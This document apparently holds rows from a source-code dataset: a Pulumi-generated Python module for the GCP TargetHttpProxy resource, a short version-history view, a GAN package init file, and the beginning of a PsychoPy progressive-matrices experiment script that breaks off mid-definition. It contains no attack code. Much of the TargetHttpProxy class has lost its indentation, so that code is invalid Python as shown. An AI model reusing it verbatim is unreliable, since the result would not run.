c3011f28859ac027aa8b40af92e7ad222b0bf9fa | 26,364 | py | Python | sdk/python/pulumi_gcp/compute/target_http_proxy.py | sisisin/pulumi-gcp | af6681d70ea457843409110c1324817fe55f68ad | [
"ECL-2.0",
"Apache-2.0"
] | 121 | 2018-06-18T19:16:42.000Z | 2022-03-31T06:06:48.000Z | sdk/python/pulumi_gcp/compute/target_http_proxy.py | sisisin/pulumi-gcp | af6681d70ea457843409110c1324817fe55f68ad | [
"ECL-2.0",
"Apache-2.0"
] | 492 | 2018-06-22T19:41:03.000Z | 2022-03-31T15:33:53.000Z | sdk/python/pulumi_gcp/compute/target_http_proxy.py | sisisin/pulumi-gcp | af6681d70ea457843409110c1324817fe55f68ad | [
"ECL-2.0",
"Apache-2.0"
] | 43 | 2018-06-19T01:43:13.000Z | 2022-03-23T22:43:37.000Z | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
__all__ = ['TargetHttpProxyArgs', 'TargetHttpProxy']
@pulumi.input_type
# NOTE(review): this class is generated by the Pulumi Terraform Bridge (tfgen)
# — see the file header.  @pulumi.input_type introspects the property
# getters/setters below, so their names and structure must not be changed by
# hand.
class TargetHttpProxyArgs:
    def __init__(__self__, *,
                 url_map: pulumi.Input[str],
                 description: Optional[pulumi.Input[str]] = None,
                 name: Optional[pulumi.Input[str]] = None,
                 project: Optional[pulumi.Input[str]] = None,
                 proxy_bind: Optional[pulumi.Input[bool]] = None):
        """
        The set of arguments for constructing a TargetHttpProxy resource.
        :param pulumi.Input[str] url_map: A reference to the UrlMap resource that defines the mapping from URL
               to the BackendService.
        :param pulumi.Input[str] description: An optional description of this resource.
        :param pulumi.Input[str] name: Name of the resource. Provided by the client when the resource is
               created. The name must be 1-63 characters long, and comply with
               RFC1035. Specifically, the name must be 1-63 characters long and match
               the regular expression `a-z?` which means the
               first character must be a lowercase letter, and all following
               characters must be a dash, lowercase letter, or digit, except the last
               character, which cannot be a dash.
        :param pulumi.Input[str] project: The ID of the project in which the resource belongs.
               If it is not provided, the provider project is used.
        :param pulumi.Input[bool] proxy_bind: This field only applies when the forwarding rule that references
               this target proxy has a loadBalancingScheme set to INTERNAL_SELF_MANAGED.
        """
        # url_map is the only required argument; optional arguments are only
        # recorded when the caller actually supplied them.
        pulumi.set(__self__, "url_map", url_map)
        if description is not None:
            pulumi.set(__self__, "description", description)
        if name is not None:
            pulumi.set(__self__, "name", name)
        if project is not None:
            pulumi.set(__self__, "project", project)
        if proxy_bind is not None:
            pulumi.set(__self__, "proxy_bind", proxy_bind)

    # Each input below is exposed as a property pair; the pulumi.getter name
    # (e.g. "urlMap") is the wire/camelCase name used by the engine.
    @property
    @pulumi.getter(name="urlMap")
    def url_map(self) -> pulumi.Input[str]:
        """
        A reference to the UrlMap resource that defines the mapping from URL
        to the BackendService.
        """
        return pulumi.get(self, "url_map")

    @url_map.setter
    def url_map(self, value: pulumi.Input[str]):
        pulumi.set(self, "url_map", value)

    @property
    @pulumi.getter
    def description(self) -> Optional[pulumi.Input[str]]:
        """
        An optional description of this resource.
        """
        return pulumi.get(self, "description")

    @description.setter
    def description(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "description", value)

    @property
    @pulumi.getter
    def name(self) -> Optional[pulumi.Input[str]]:
        """
        Name of the resource. Provided by the client when the resource is
        created. The name must be 1-63 characters long, and comply with
        RFC1035. Specifically, the name must be 1-63 characters long and match
        the regular expression `a-z?` which means the
        first character must be a lowercase letter, and all following
        characters must be a dash, lowercase letter, or digit, except the last
        character, which cannot be a dash.
        """
        return pulumi.get(self, "name")

    @name.setter
    def name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "name", value)

    @property
    @pulumi.getter
    def project(self) -> Optional[pulumi.Input[str]]:
        """
        The ID of the project in which the resource belongs.
        If it is not provided, the provider project is used.
        """
        return pulumi.get(self, "project")

    @project.setter
    def project(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "project", value)

    @property
    @pulumi.getter(name="proxyBind")
    def proxy_bind(self) -> Optional[pulumi.Input[bool]]:
        """
        This field only applies when the forwarding rule that references
        this target proxy has a loadBalancingScheme set to INTERNAL_SELF_MANAGED.
        """
        return pulumi.get(self, "proxy_bind")

    @proxy_bind.setter
    def proxy_bind(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "proxy_bind", value)
@pulumi.input_type
# NOTE(review): tfgen-generated (see file header).  Unlike TargetHttpProxyArgs
# every field here is optional, because this type describes a partial state
# used for lookups/filtering, including the output-only fields
# creation_timestamp, proxy_id and self_link.
class _TargetHttpProxyState:
    def __init__(__self__, *,
                 creation_timestamp: Optional[pulumi.Input[str]] = None,
                 description: Optional[pulumi.Input[str]] = None,
                 name: Optional[pulumi.Input[str]] = None,
                 project: Optional[pulumi.Input[str]] = None,
                 proxy_bind: Optional[pulumi.Input[bool]] = None,
                 proxy_id: Optional[pulumi.Input[int]] = None,
                 self_link: Optional[pulumi.Input[str]] = None,
                 url_map: Optional[pulumi.Input[str]] = None):
        """
        Input properties used for looking up and filtering TargetHttpProxy resources.
        :param pulumi.Input[str] creation_timestamp: Creation timestamp in RFC3339 text format.
        :param pulumi.Input[str] description: An optional description of this resource.
        :param pulumi.Input[str] name: Name of the resource. Provided by the client when the resource is
               created. The name must be 1-63 characters long, and comply with
               RFC1035. Specifically, the name must be 1-63 characters long and match
               the regular expression `a-z?` which means the
               first character must be a lowercase letter, and all following
               characters must be a dash, lowercase letter, or digit, except the last
               character, which cannot be a dash.
        :param pulumi.Input[str] project: The ID of the project in which the resource belongs.
               If it is not provided, the provider project is used.
        :param pulumi.Input[bool] proxy_bind: This field only applies when the forwarding rule that references
               this target proxy has a loadBalancingScheme set to INTERNAL_SELF_MANAGED.
        :param pulumi.Input[int] proxy_id: The unique identifier for the resource.
        :param pulumi.Input[str] self_link: The URI of the created resource.
        :param pulumi.Input[str] url_map: A reference to the UrlMap resource that defines the mapping from URL
               to the BackendService.
        """
        # Only record the fields the caller actually supplied.
        if creation_timestamp is not None:
            pulumi.set(__self__, "creation_timestamp", creation_timestamp)
        if description is not None:
            pulumi.set(__self__, "description", description)
        if name is not None:
            pulumi.set(__self__, "name", name)
        if project is not None:
            pulumi.set(__self__, "project", project)
        if proxy_bind is not None:
            pulumi.set(__self__, "proxy_bind", proxy_bind)
        if proxy_id is not None:
            pulumi.set(__self__, "proxy_id", proxy_id)
        if self_link is not None:
            pulumi.set(__self__, "self_link", self_link)
        if url_map is not None:
            pulumi.set(__self__, "url_map", url_map)

    # Property pairs below mirror the fields above; the pulumi.getter name is
    # the camelCase wire name used by the engine.
    @property
    @pulumi.getter(name="creationTimestamp")
    def creation_timestamp(self) -> Optional[pulumi.Input[str]]:
        """
        Creation timestamp in RFC3339 text format.
        """
        return pulumi.get(self, "creation_timestamp")

    @creation_timestamp.setter
    def creation_timestamp(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "creation_timestamp", value)

    @property
    @pulumi.getter
    def description(self) -> Optional[pulumi.Input[str]]:
        """
        An optional description of this resource.
        """
        return pulumi.get(self, "description")

    @description.setter
    def description(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "description", value)

    @property
    @pulumi.getter
    def name(self) -> Optional[pulumi.Input[str]]:
        """
        Name of the resource. Provided by the client when the resource is
        created. The name must be 1-63 characters long, and comply with
        RFC1035. Specifically, the name must be 1-63 characters long and match
        the regular expression `a-z?` which means the
        first character must be a lowercase letter, and all following
        characters must be a dash, lowercase letter, or digit, except the last
        character, which cannot be a dash.
        """
        return pulumi.get(self, "name")

    @name.setter
    def name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "name", value)

    @property
    @pulumi.getter
    def project(self) -> Optional[pulumi.Input[str]]:
        """
        The ID of the project in which the resource belongs.
        If it is not provided, the provider project is used.
        """
        return pulumi.get(self, "project")

    @project.setter
    def project(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "project", value)

    @property
    @pulumi.getter(name="proxyBind")
    def proxy_bind(self) -> Optional[pulumi.Input[bool]]:
        """
        This field only applies when the forwarding rule that references
        this target proxy has a loadBalancingScheme set to INTERNAL_SELF_MANAGED.
        """
        return pulumi.get(self, "proxy_bind")

    @proxy_bind.setter
    def proxy_bind(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "proxy_bind", value)

    @property
    @pulumi.getter(name="proxyId")
    def proxy_id(self) -> Optional[pulumi.Input[int]]:
        """
        The unique identifier for the resource.
        """
        return pulumi.get(self, "proxy_id")

    @proxy_id.setter
    def proxy_id(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "proxy_id", value)

    @property
    @pulumi.getter(name="selfLink")
    def self_link(self) -> Optional[pulumi.Input[str]]:
        """
        The URI of the created resource.
        """
        return pulumi.get(self, "self_link")

    @self_link.setter
    def self_link(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "self_link", value)

    @property
    @pulumi.getter(name="urlMap")
    def url_map(self) -> Optional[pulumi.Input[str]]:
        """
        A reference to the UrlMap resource that defines the mapping from URL
        to the BackendService.
        """
        return pulumi.get(self, "url_map")

    @url_map.setter
    def url_map(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "url_map", value)
class TargetHttpProxy(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
description: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
project: Optional[pulumi.Input[str]] = None,
proxy_bind: Optional[pulumi.Input[bool]] = None,
url_map: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
Represents a TargetHttpProxy resource, which is used by one or more global
forwarding rule to route incoming HTTP requests to a URL map.
To get more information about TargetHttpProxy, see:
* [API documentation](https://cloud.google.com/compute/docs/reference/v1/targetHttpProxies)
* How-to Guides
* [Official Documentation](https://cloud.google.com/compute/docs/load-balancing/http/target-proxies)
## Example Usage
### Target Http Proxy Basic
```python
import pulumi
import pulumi_gcp as gcp
default_http_health_check = gcp.compute.HttpHealthCheck("defaultHttpHealthCheck",
request_path="/",
check_interval_sec=1,
timeout_sec=1)
default_backend_service = gcp.compute.BackendService("defaultBackendService",
port_name="http",
protocol="HTTP",
timeout_sec=10,
health_checks=[default_http_health_check.id])
default_url_map = gcp.compute.URLMap("defaultURLMap",
default_service=default_backend_service.id,
host_rules=[gcp.compute.URLMapHostRuleArgs(
hosts=["mysite.com"],
path_matcher="allpaths",
)],
path_matchers=[gcp.compute.URLMapPathMatcherArgs(
name="allpaths",
default_service=default_backend_service.id,
path_rules=[gcp.compute.URLMapPathMatcherPathRuleArgs(
paths=["/*"],
service=default_backend_service.id,
)],
)])
default_target_http_proxy = gcp.compute.TargetHttpProxy("defaultTargetHttpProxy", url_map=default_url_map.id)
```
### Target Http Proxy Https Redirect
```python
import pulumi
import pulumi_gcp as gcp
default_url_map = gcp.compute.URLMap("defaultURLMap", default_url_redirect=gcp.compute.URLMapDefaultUrlRedirectArgs(
https_redirect=True,
strip_query=False,
))
default_target_http_proxy = gcp.compute.TargetHttpProxy("defaultTargetHttpProxy", url_map=default_url_map.id)
```
## Import
TargetHttpProxy can be imported using any of these accepted formats
```sh
$ pulumi import gcp:compute/targetHttpProxy:TargetHttpProxy default projects/{{project}}/global/targetHttpProxies/{{name}}
```
```sh
$ pulumi import gcp:compute/targetHttpProxy:TargetHttpProxy default {{project}}/{{name}}
```
```sh
$ pulumi import gcp:compute/targetHttpProxy:TargetHttpProxy default {{name}}
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] description: An optional description of this resource.
:param pulumi.Input[str] name: Name of the resource. Provided by the client when the resource is
created. The name must be 1-63 characters long, and comply with
RFC1035. Specifically, the name must be 1-63 characters long and match
the regular expression `a-z?` which means the
first character must be a lowercase letter, and all following
characters must be a dash, lowercase letter, or digit, except the last
character, which cannot be a dash.
:param pulumi.Input[str] project: The ID of the project in which the resource belongs.
If it is not provided, the provider project is used.
:param pulumi.Input[bool] proxy_bind: This field only applies when the forwarding rule that references
this target proxy has a loadBalancingScheme set to INTERNAL_SELF_MANAGED.
:param pulumi.Input[str] url_map: A reference to the UrlMap resource that defines the mapping from URL
to the BackendService.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: TargetHttpProxyArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Represents a TargetHttpProxy resource, which is used by one or more global
forwarding rule to route incoming HTTP requests to a URL map.
To get more information about TargetHttpProxy, see:
* [API documentation](https://cloud.google.com/compute/docs/reference/v1/targetHttpProxies)
* How-to Guides
* [Official Documentation](https://cloud.google.com/compute/docs/load-balancing/http/target-proxies)
## Example Usage
### Target Http Proxy Basic
```python
import pulumi
import pulumi_gcp as gcp
default_http_health_check = gcp.compute.HttpHealthCheck("defaultHttpHealthCheck",
request_path="/",
check_interval_sec=1,
timeout_sec=1)
default_backend_service = gcp.compute.BackendService("defaultBackendService",
port_name="http",
protocol="HTTP",
timeout_sec=10,
health_checks=[default_http_health_check.id])
default_url_map = gcp.compute.URLMap("defaultURLMap",
default_service=default_backend_service.id,
host_rules=[gcp.compute.URLMapHostRuleArgs(
hosts=["mysite.com"],
path_matcher="allpaths",
)],
path_matchers=[gcp.compute.URLMapPathMatcherArgs(
name="allpaths",
default_service=default_backend_service.id,
path_rules=[gcp.compute.URLMapPathMatcherPathRuleArgs(
paths=["/*"],
service=default_backend_service.id,
)],
)])
default_target_http_proxy = gcp.compute.TargetHttpProxy("defaultTargetHttpProxy", url_map=default_url_map.id)
```
### Target Http Proxy Https Redirect
```python
import pulumi
import pulumi_gcp as gcp
default_url_map = gcp.compute.URLMap("defaultURLMap", default_url_redirect=gcp.compute.URLMapDefaultUrlRedirectArgs(
https_redirect=True,
strip_query=False,
))
default_target_http_proxy = gcp.compute.TargetHttpProxy("defaultTargetHttpProxy", url_map=default_url_map.id)
```
## Import
TargetHttpProxy can be imported using any of these accepted formats
```sh
$ pulumi import gcp:compute/targetHttpProxy:TargetHttpProxy default projects/{{project}}/global/targetHttpProxies/{{name}}
```
```sh
$ pulumi import gcp:compute/targetHttpProxy:TargetHttpProxy default {{project}}/{{name}}
```
```sh
$ pulumi import gcp:compute/targetHttpProxy:TargetHttpProxy default {{name}}
```
:param str resource_name: The name of the resource.
:param TargetHttpProxyArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(TargetHttpProxyArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
description: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
project: Optional[pulumi.Input[str]] = None,
proxy_bind: Optional[pulumi.Input[bool]] = None,
url_map: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = TargetHttpProxyArgs.__new__(TargetHttpProxyArgs)
__props__.__dict__["description"] = description
__props__.__dict__["name"] = name
__props__.__dict__["project"] = project
__props__.__dict__["proxy_bind"] = proxy_bind
if url_map is None and not opts.urn:
raise TypeError("Missing required property 'url_map'")
__props__.__dict__["url_map"] = url_map
__props__.__dict__["creation_timestamp"] = None
__props__.__dict__["proxy_id"] = None
__props__.__dict__["self_link"] = None
super(TargetHttpProxy, __self__).__init__(
'gcp:compute/targetHttpProxy:TargetHttpProxy',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
        id: pulumi.Input[str],
        opts: Optional[pulumi.ResourceOptions] = None,
        creation_timestamp: Optional[pulumi.Input[str]] = None,
        description: Optional[pulumi.Input[str]] = None,
        name: Optional[pulumi.Input[str]] = None,
        project: Optional[pulumi.Input[str]] = None,
        proxy_bind: Optional[pulumi.Input[bool]] = None,
        proxy_id: Optional[pulumi.Input[int]] = None,
        self_link: Optional[pulumi.Input[str]] = None,
        url_map: Optional[pulumi.Input[str]] = None) -> 'TargetHttpProxy':
    """
    Get an existing TargetHttpProxy resource's state with the given name, id, and optional extra
    properties used to qualify the lookup.

    :param str resource_name: The unique name of the resulting resource.
    :param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
    :param pulumi.ResourceOptions opts: Options for the resource.
    :param pulumi.Input[str] creation_timestamp: Creation timestamp in RFC3339 text format.
    :param pulumi.Input[str] description: An optional description of this resource.
    :param pulumi.Input[str] name: Name of the resource. Provided by the client when the resource is
           created. The name must be 1-63 characters long, and comply with
           RFC1035. Specifically, the name must be 1-63 characters long and match
           the regular expression `a-z?` which means the
           first character must be a lowercase letter, and all following
           characters must be a dash, lowercase letter, or digit, except the last
           character, which cannot be a dash.
    :param pulumi.Input[str] project: The ID of the project in which the resource belongs.
           If it is not provided, the provider project is used.
    :param pulumi.Input[bool] proxy_bind: This field only applies when the forwarding rule that references
           this target proxy has a loadBalancingScheme set to INTERNAL_SELF_MANAGED.
    :param pulumi.Input[int] proxy_id: The unique identifier for the resource.
    :param pulumi.Input[str] self_link: The URI of the created resource.
    :param pulumi.Input[str] url_map: A reference to the UrlMap resource that defines the mapping from URL
           to the BackendService.
    """
    # Supplying an id in the options tells the engine to read the existing
    # resource rather than create a new one.
    opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))

    # Build the state bag directly; __new__ skips __init__ validation since
    # these values describe already-existing state, not a create request.
    __props__ = _TargetHttpProxyState.__new__(_TargetHttpProxyState)

    __props__.__dict__["creation_timestamp"] = creation_timestamp
    __props__.__dict__["description"] = description
    __props__.__dict__["name"] = name
    __props__.__dict__["project"] = project
    __props__.__dict__["proxy_bind"] = proxy_bind
    __props__.__dict__["proxy_id"] = proxy_id
    __props__.__dict__["self_link"] = self_link
    __props__.__dict__["url_map"] = url_map
    return TargetHttpProxy(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="creationTimestamp")
def creation_timestamp(self) -> pulumi.Output[str]:
    """The RFC3339-formatted timestamp recorded when the resource was created."""
    timestamp = pulumi.get(self, "creation_timestamp")
    return timestamp
@property
@pulumi.getter
def description(self) -> pulumi.Output[Optional[str]]:
    """Optional free-form description attached to this resource."""
    value = pulumi.get(self, "description")
    return value
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
    """Client-chosen resource name.

    Must be 1-63 characters and satisfy RFC1035: it matches the regular
    expression `a-z?`, i.e. it starts with a lowercase letter, continues
    with dashes, lowercase letters, or digits, and does not end with a
    dash.
    """
    value = pulumi.get(self, "name")
    return value
@property
@pulumi.getter
def project(self) -> pulumi.Output[str]:
    """ID of the owning project; falls back to the provider's project when unset."""
    value = pulumi.get(self, "project")
    return value
@property
@pulumi.getter(name="proxyBind")
def proxy_bind(self) -> pulumi.Output[bool]:
    """Only meaningful when the referencing forwarding rule uses a
    loadBalancingScheme of INTERNAL_SELF_MANAGED."""
    value = pulumi.get(self, "proxy_bind")
    return value
@property
@pulumi.getter(name="proxyId")
def proxy_id(self) -> pulumi.Output[int]:
    """Server-assigned unique identifier for the resource."""
    identifier = pulumi.get(self, "proxy_id")
    return identifier
@property
@pulumi.getter(name="selfLink")
def self_link(self) -> pulumi.Output[str]:
    """URI of the created resource."""
    link = pulumi.get(self, "self_link")
    return link
@property
@pulumi.getter(name="urlMap")
def url_map(self) -> pulumi.Output[str]:
    """Reference to the UrlMap that maps request URLs onto BackendServices."""
    value = pulumi.get(self, "url_map")
    return value
| 42.522581 | 134 | 0.636019 | 3,082 | 26,364 | 5.261843 | 0.085334 | 0.059012 | 0.056977 | 0.055621 | 0.871185 | 0.848492 | 0.832645 | 0.823025 | 0.81988 | 0.784547 | 0 | 0.005067 | 0.273896 | 26,364 | 619 | 135 | 42.591276 | 0.842083 | 0.480693 | 0 | 0.677165 | 1 | 0 | 0.083618 | 0.003769 | 0 | 0 | 0 | 0 | 0 | 1 | 0.161417 | false | 0.003937 | 0.019685 | 0 | 0.279528 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
c32d755b701c2eff52112133c79c6f396a89265a | 193 | py | Python | turkey/version_history.py | geokala/quizify | 1096423880dd50b935fcd31fc6ffbbe1cca65834 | [
"BSD-3-Clause"
] | null | null | null | turkey/version_history.py | geokala/quizify | 1096423880dd50b935fcd31fc6ffbbe1cca65834 | [
"BSD-3-Clause"
] | null | null | null | turkey/version_history.py | geokala/quizify | 1096423880dd50b935fcd31fc6ffbbe1cca65834 | [
"BSD-3-Clause"
] | null | null | null | from turkey.utils import render_turkey
from turkey.version import version_history
def version_history_view():
    """Render the version-history page, passing the recorded history to the template."""
    template_name = "version_history.html"
    return render_turkey(template_name, version_history=version_history)
| 32.166667 | 81 | 0.84456 | 26 | 193 | 5.961538 | 0.423077 | 0.451613 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.093264 | 193 | 5 | 82 | 38.6 | 0.885714 | 0 | 0 | 0 | 0 | 0 | 0.103627 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | true | 0 | 0.5 | 0.25 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 1 | 1 | 0 | 0 | 8 |
5eebddc903838bba54271921cf9e56f50dfaa93f | 154 | py | Python | architectures/cond_dcgan_spect_norm_pixelnorm_minibatchstd_self_attention/__init__.py | alexpod1000/FaceGen-GAN | 202b59f7bf8b6a48bba8a30fed16db6517af4eb7 | [
"MIT"
] | 8 | 2020-08-13T12:25:09.000Z | 2022-03-02T04:54:27.000Z | architectures/cond_dcgan_spect_norm_pixelnorm_minibatchstd_self_attention/__init__.py | alexpod1000/FaceGen-GAN | 202b59f7bf8b6a48bba8a30fed16db6517af4eb7 | [
"MIT"
] | null | null | null | architectures/cond_dcgan_spect_norm_pixelnorm_minibatchstd_self_attention/__init__.py | alexpod1000/FaceGen-GAN | 202b59f7bf8b6a48bba8a30fed16db6517af4eb7 | [
"MIT"
] | null | null | null | from .generator import Generator
from .discriminator import Discriminator
from .gan_wrapper import GAN_Wrapper
from .gan_wrapper_ema import GAN_WrapperEMA | 38.5 | 43 | 0.876623 | 21 | 154 | 6.190476 | 0.380952 | 0.230769 | 0.215385 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.097403 | 154 | 4 | 43 | 38.5 | 0.935252 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
6f0a38fde9ffc17e83dcf49d24ef7000159e0552 | 73,463 | py | Python | Matrices/Matrices_lastrun.py | NCMlab/CogntiveTasksOnline | 02e2bdb2b54a96b609fd5658cac4323322f183f0 | [
"MIT"
] | 5 | 2019-06-20T03:27:55.000Z | 2022-03-06T07:31:36.000Z | Matrices/Matrices_lastrun.py | NCMlab/CogntiveTasksOnline | 02e2bdb2b54a96b609fd5658cac4323322f183f0 | [
"MIT"
] | 9 | 2018-10-23T02:11:00.000Z | 2019-07-03T15:29:07.000Z | Matrices/Matrices_lastrun.py | NCMlab/CogntiveTasksOnline | 02e2bdb2b54a96b609fd5658cac4323322f183f0 | [
"MIT"
] | 2 | 2020-08-24T13:55:57.000Z | 2022-03-06T07:31:40.000Z | #!/usr/bin/env python2
# -*- coding: utf-8 -*-
"""
This experiment was created using PsychoPy2 Experiment Builder (v1.85.1),
on Fri Nov 2 12:06:06 2018
If you publish work using this script please cite the PsychoPy publications:
Peirce, JW (2007) PsychoPy - Psychophysics software in Python.
Journal of Neuroscience Methods, 162(1-2), 8-13.
Peirce, JW (2009) Generating stimuli for neuroscience using PsychoPy.
Frontiers in Neuroinformatics, 2:10. doi: 10.3389/neuro.11.010.2008
"""
from __future__ import absolute_import, division
from psychopy import locale_setup, gui, visual, core, data, event, logging, sound
from psychopy.constants import (NOT_STARTED, STARTED, PLAYING, PAUSED,
STOPPED, FINISHED, PRESSED, RELEASED, FOREVER)
import numpy as np # whole numpy lib is available, prepend 'np.'
from numpy import (sin, cos, tan, log, log10, pi, average,
sqrt, std, deg2rad, rad2deg, linspace, asarray)
from numpy.random import random, randint, normal, shuffle
import os # handy system and path functions
import sys # to get file system encoding
# Ensure that relative paths start from the same directory as this script
_thisDir = os.path.dirname(os.path.abspath(__file__)).decode(sys.getfilesystemencoding())
os.chdir(_thisDir)
# Store info about the experiment session
expName = 'Matrices' # from the Builder filename that created this script
expInfo = {u'session': u'001', u'participant': u''}
expInfo['date'] = data.getDateStr() # add a simple timestamp
expInfo['expName'] = expName
# Data file name stem = absolute path + name; later add .psyexp, .csv, .log, etc
filename = _thisDir + os.sep + u'data/%s_%s_%s' % (expInfo['participant'], expName, expInfo['date'])
# An ExperimentHandler isn't essential but helps with data saving
thisExp = data.ExperimentHandler(name=expName, version='',
extraInfo=expInfo, runtimeInfo=None,
originPath=u'/Users/jasonsteffener/Documents/GitHub/CognitiveTasks/Matrices/Matrices.psyexp',
savePickle=True, saveWideText=True,
dataFileName=filename)
# save a log file for detail verbose info
logFile = logging.LogFile(filename+'.log', level=logging.EXP)
logging.console.setLevel(logging.WARNING) # this outputs to the screen, not a file
endExpNow = False # flag for 'escape' or other condition => quit the exp
# Start Code - component code to be run before the window creation
# Setup the Window
win = visual.Window(
size=(1440, 900), fullscr=True, screen=0,
allowGUI=False, allowStencil=False,
monitor='testMonitor', color=[0,0,0], colorSpace='rgb',
blendMode='avg', useFBO=True,
units='pix')
# store frame rate of monitor if we can measure it
expInfo['frameRate'] = win.getActualFrameRate()
if expInfo['frameRate'] != None:
frameDur = 1.0 / round(expInfo['frameRate'])
else:
frameDur = 1.0 / 60.0 # could not measure, so guess
# Initialize components for Routine "Instructions"
InstructionsClock = core.Clock()
Instruct = visual.TextStim(win=win, name='Instruct',
text='Progressive Matrices\n\nThis is a test of observation and clear thinking.\nAt the top of the screen you will see a pattern with a bit cut out of it. You will look at the pattern, think what the piece must be that is needed to complete the pattern correctly both along and down. Then find the right piece out of the eight bits shown below.\nOnly one of these pieces is perfectly correct.\n\nPress any key to perform practice trials.',
font='Arial',
pos=(0, 0), height=40, wrapWidth=1000, ori=0,
color='black', colorSpace='rgb', opacity=1,
depth=0.0);
# Initialize components for Routine "trial"
trialClock = core.Clock()
image = visual.ImageStim(
win=win, name='image',
image='sin', mask=None,
ori=0, pos=(0, 200), size=1.0,
color=[1,1,1], colorSpace='rgb', opacity=1,
flipHoriz=False, flipVert=False,
texRes=128, interpolate=True, depth=0.0)
CFig1 = visual.ImageStim(
win=win, name='CFig1',
image='sin', mask=None,
ori=0, pos=(-225, -75), size=(120, 120),
color=[1,1,1], colorSpace='rgb', opacity=1,
flipHoriz=False, flipVert=False,
texRes=128, interpolate=True, depth=-1.0)
CFig2 = visual.ImageStim(
win=win, name='CFig2',
image='sin', mask=None,
ori=0, pos=(-75, -75), size=(120, 120),
color=[1,1,1], colorSpace='rgb', opacity=1,
flipHoriz=False, flipVert=False,
texRes=128, interpolate=True, depth=-2.0)
CFig3 = visual.ImageStim(
win=win, name='CFig3',
image='sin', mask=None,
ori=0, pos=(75, -75), size=(120, 120),
color=[1,1,1], colorSpace='rgb', opacity=1,
flipHoriz=False, flipVert=False,
texRes=128, interpolate=True, depth=-3.0)
CFig4 = visual.ImageStim(
win=win, name='CFig4',
image='sin', mask=None,
ori=0, pos=(225, -75), size=(120, 120),
color=[1,1,1], colorSpace='rgb', opacity=1,
flipHoriz=False, flipVert=False,
texRes=128, interpolate=True, depth=-4.0)
CFig5 = visual.ImageStim(
win=win, name='CFig5',
image='sin', mask=None,
ori=0, pos=(-225, -225), size=(120,120),
color=[1,1,1], colorSpace='rgb', opacity=1,
flipHoriz=False, flipVert=False,
texRes=128, interpolate=True, depth=-5.0)
CFIg6 = visual.ImageStim(
win=win, name='CFIg6',
image='sin', mask=None,
ori=0, pos=(-75, -225), size=(120, 120),
color=[1,1,1], colorSpace='rgb', opacity=1,
flipHoriz=False, flipVert=False,
texRes=128, interpolate=True, depth=-6.0)
Opt1 = visual.TextStim(win=win, name='Opt1',
text=u'1',
font=u'Arial',
pos=(-170, -30), height=40, wrapWidth=None, ori=0,
color=u'black', colorSpace='rgb', opacity=1,
depth=-7.0);
Opt2 = visual.TextStim(win=win, name='Opt2',
text=u'2',
